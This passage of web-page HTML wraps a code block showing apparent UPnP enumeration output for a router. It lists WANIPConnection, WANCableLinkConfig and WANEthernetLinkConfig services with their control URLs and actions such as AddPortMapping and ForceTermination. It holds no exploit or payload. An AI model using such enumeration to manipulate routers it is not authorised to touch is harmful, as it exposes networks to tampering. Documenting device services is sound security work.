0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANIPConnection:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: 
relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wanipconnection1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANIPConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANIPConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; 
break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wanipconnectionSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" 
style="box-sizing: border-box;"> </span> SetConnectionType</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetConnectionTypeInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetAutoDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 
0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetAutoDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetIdleDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " 
role="presentation" style="box-sizing: border-box;"> </span> SetIdleDisconnectTime</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetWarnDisconnectDelay</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetWarnDisconnectDelay</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; 
font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetStatusInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetNATRSIPStatus</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" 
cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetGenericPortMappingEntry</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetSpecificPortMappingEntry</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> AddPortMapping</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: 
inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> DeletePortMapping</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetExternalIPAddress</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span 
class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ForceTermination</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> RequestTermination</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> RequestConnection</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: 
inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANCableLinkConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:WANCableLinkConfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANCableLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" 
style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: </span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wancablelinkconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " 
role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetCableLinkConfigInfo</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDownstreamFrequency</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; 
break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDownstreamModulation</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamFrequency</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " 
role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamModulation</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamChannelID</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetUpstreamPowerLevel</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; 
box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetBPIEncryptionEnabled</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetConfigFile</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" 
cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTFTPServer</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANEthernetLinkConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wanetherlinkconfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; 
margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANEthernetLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANEthernetLinkConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 